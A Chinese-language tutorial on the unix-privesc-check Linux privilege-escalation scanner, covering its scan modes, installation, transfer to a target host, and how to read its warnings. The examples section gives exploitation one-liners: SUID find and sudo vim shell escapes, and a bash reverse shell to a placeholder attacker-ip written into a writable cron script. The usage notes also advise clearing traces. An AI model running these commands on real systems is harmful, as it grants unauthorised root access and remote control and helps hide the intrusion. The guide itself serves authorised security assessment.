unix-privesc-check使用教程

张开发
2026/4/10 16:29:37 15 分钟阅读

分享文章

unix-privesc-check使用教程
unix-privesc-check是Kali Linux中一款款专注于Unix/Linux系统本地权限提升检测的轻量级脚本工具。它通过自动化扫描系统中的文件权限、配置设置和潜在安全漏洞帮助渗透测试人员和系统管理员识别可能被本地用户利用来提升权限如从普通用户获取root权限的安全风险点。作为一款专注于权限提升检测的工具unix-privesc-check设计简洁、运行高效无需复杂配置即可快速执行扫描非常适合在渗透测试的后渗透阶段使用——当测试人员已获得目标系统的低权限访问后可通过该工具快速定位提权突破口为后续的权限提升操作提供重要参考。一、unix-privesc-check核心功能与特点核心功能检查SUID/SGID文件权限配置识别可能被滥用的高权限可执行文件扫描敏感系统文件如/etc/sudoers、/etc/passwd的权限设置检测系统环境变量配置中的安全隐患分析计划任务crontab的权限设置和执行脚本检查用户和组的权限配置识别可能存在的符号链接漏洞工具特点双模式扫描提供standard标准模式和detailed详细模式两种扫描模式可根据需求平衡扫描速度和检测深度轻量级设计纯脚本实现无需安装额外依赖可直接在目标系统上运行结果清晰扫描结果中以”WARNING”标记高风险项便于快速定位问题兼容性强支持绝大多数Unix/Linux发行版包括各种主流Linux系统和Unix系统合规性提示内置法律合规提醒强调仅可在获得授权的系统上使用二、工具用法说明中文翻译与表格类别英文原文中文翻译基本用法Usage: unix-privesc-check { standard | detailed }用法unix-privesc-check { standard标准模式| detailed详细模式}标准模式说明“standard” mode: Speed-optimised check of lots of security settings.“standard标准模式”针对大量安全设置的速度优化型检查扫描速度快适合快速初步排查。详细模式说明“detailed” mode: Same as standard mode, but also checks perms of open file handles and called files (e.g. parsed from shell scripts, linked .so files). This mode is slow and prone to false positives but might help you find more subtle flaws in 3rd party programs.“detailed详细模式”与标准模式功能相同但额外检查开放文件句柄的权限和被调用文件的权限例如从shell脚本解析的文件、关联的.so动态链接库文件。此模式速度慢且易产生误报但可能帮助发现第三方程序中更隐蔽的漏洞。工具作用This script checks file permissions and other settings that could allow local users to escalate privileges.该脚本检查可能允许本地用户提升权限的文件权限及其他配置设置。法律声明Use of this script is only permitted on systems which you have been granted legal permission to perform a security assessment of. Apart from this condition the GPL v2 applies.仅允许在您已获得合法授权、可执行安全评估的系统上使用此脚本。除本条款外本脚本适用GPL v2GNU通用公共许可证第2版协议。结果解读Search the output for the word ‘WARNING’. If you don’t see it then this script didn’t find any problems.在输出内容中搜索”WARNING”关键词。若未找到该关键词则说明此脚本未检测到任何风险问题。三、unix-privesc-check使用教程1. 工具获取与准备在Kali Linux中unix-privesc-check通常已预装可通过以下命令确认which unix-privesc-check如果未安装可以通过以下命令安装sudo apt update sudo apt install unix-privesc-check也可以从网上下载脚本文件wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/unix-privesc-check chmod x unix-privesc-check2. 传输工具到目标系统通常需要将工具传输到已获取低权限访问的目标系统常用方法有1使用Python HTTP服务器传输在Kali本地启动HTTP服务器python3 -m http.server 8080在目标系统上下载wget http://kali-ip:8080/unix-privesc-check -O /tmp/unix-privesc-check chmod x /tmp/unix-privesc-check2使用scp传输如果有SSH访问权限scp unix-privesc-check usertarget-ip:/tmp/3. 基本使用方法1标准模式扫描标准模式扫描速度快适合快速初步评估系统安全状况./unix-privesc-check standard建议将结果输出到文件以便后续分析./unix-privesc-check standard privesc-scan-standard.txt2详细模式扫描详细模式提供更深入的检查但速度较慢且可能产生误报./unix-privesc-check detailed输出到文件./unix-privesc-check detailed privesc-scan-detailed.txt4. 结果分析方法扫描完成后主要关注输出中的”WARNING”条目这些是可能的权限提升点# 在结果文件中搜索警告信息 grep WARNING privesc-scan-standard.txt常见的高风险警告包括具有SUID权限的危险命令如nmap、vim、find等/etc/sudoers文件配置不当允许用户无需密码执行命令敏感系统文件具有过宽的写入权限计划任务crontab配置不当允许普通用户修改内核版本存在已知的权限提升漏洞5. 典型场景应用示例示例1发现具有SUID权限的find命令扫描结果中出现类似以下警告WARNING: SUID file /usr/bin/find has permissions 4755利用方法find / -exec /bin/sh \; -quit示例2发现sudo配置不当扫描结果中出现类似以下警告WARNING: User test can run /usr/bin/vim as root without password利用方法sudo vim :!sh # 在vim中执行shell获取root权限示例3发现具有写入权限的计划任务脚本扫描结果中出现类似以下警告WARNING: Cron job /etc/cron.hourly/backup.sh is writable by user test利用方法echo /bin/bash -i /dev/tcp/attacker-ip/4444 01 /etc/cron.hourly/backup.sh # 等待计划任务执行或触发执行获取反向shell四、使用注意事项合法授权仅在获得明确合法授权的系统上使用该工具未经授权的扫描可能违反法律法规模式选择一般先使用标准模式进行快速扫描发现潜在问题后再使用详细模式深入分析结果验证详细模式可能产生误报发现警告后需手动验证确认是否真的存在可利用的漏洞系统影响详细模式可能对系统性能产生一定影响建议在非生产高峰期使用痕迹清理在渗透测试中使用完毕后应清理工具文件和扫描结果避免留下痕迹结合其他工具该工具应与其他权限提升工具如linpeas结合使用以全面评估系统安全状况五、总结unix-privesc-check是一款简单实用的Unix/Linux权限提升检测工具通过双模式扫描设计能够满足不同场景下的权限提升漏洞检测需求。其输出结果清晰直观特别适合渗透测试人员在获取低权限访问后快速定位提权突破口。使用时应注意合法授权结合实际场景选择合适的扫描模式并对扫描结果进行手动验证。虽然工具功能相对基础但在权限提升测试中仍能发挥重要作用是渗透测试人员和系统管理员进行安全评估的得力助手。

更多文章